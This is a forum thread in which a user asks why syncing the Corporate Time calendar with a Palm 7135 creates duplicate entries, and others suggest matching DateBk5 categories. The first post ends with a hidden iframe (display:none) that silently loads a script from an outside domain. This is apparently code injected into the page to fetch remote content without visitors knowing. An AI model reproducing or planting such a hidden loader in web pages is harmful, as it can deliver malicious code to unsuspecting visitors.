+ Reply to Thread
    wwk

"Corporate Time" and Duplicate Entries

Hi... I'm new here and very impressed by the expertise of the members.

Searched for answer to my problem, and believe that it hasn't been addressed, so thought I'd try here.

My firm uses "corporate time" as our calendar... there is a conduit that allows syncing with my 7135. Problem is that most every time I sync, I end up with duplicate date book entries in my desktop CT calendar and frequently in the handheld, too. I've used UnDupe to remove the dupes in the HH, but the desktop duplicates are incredibly frustrating.

I also use DateBook V on the HH, and Outlook for my e-mail client and address book, so I've got Pocket Mirror installed too, and have tried the "multiple PC" fix, etc... Pimlico Software (DateBook V developer) suggests that such problems are conduit based... I've tried everything, including making it so that the default hotsync is HH overwriting desktop etc.,but nothing seems to work.

Not sure if Corporate Time is widely used, so don't know if anyone will be able to help, but appreciate the assistance.

Thanks!<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I had a similar problem when syncing to my dental software. I had to make certain that the catagories of the entries matched in all of the apps (dental and Palm desktop). Once I did that, the duplicates were no more. If one of your apps will not allow catagories, I guess you would have to make your Palm catagories "unfiled".

Hope this helps.
    Krazman - "IT MAY BE THAT YOUR PURPOSE IN LIFE IS TO SERVE AS A WARNING TO OTHERS"

I think Krazman is right. I use DateBk5 and MeetingMaker at work. Intellisync provides the conduit. I have to leave entries coming from the desktop as unfiled on the handheld. Other wise I end up with duplicates on the desktop.

-Quick

wwk
    Thanks for the suggestions... but I don't think Corporate Time date book entries use categories... or at least not that I'm aware of for dates at least (though it does use them for contacts and addresses and the like). I only use the calendaring part of Corporate Time though (as I need to allow my secretary and others in the company to be able to request to schedule me through it), and I don't ever remember specifying a category.

DateBK 5 does use catagories. If Corporate Time doesn't use catagories, DateBK 5 will assign the catagory "unfiled" to the entry. It will also assign the default entry you specified in preferences to all entries made in DateBK 5. The next time you get duplicate entries, look at the catagories assigned to each duplicate (while you are in DateBK 5). That will give you the key to solving this problem.
    Krazman - "IT MAY BE THAT YOUR PURPOSE IN LIFE IS TO SERVE AS A WARNING TO OTHERS"

wwk
    Thanks, Krazman... I'll check it out on Monday... I hope that's it, b/c my secretary is ready to kill me after deleting duplicate entries for about an hour on Friday!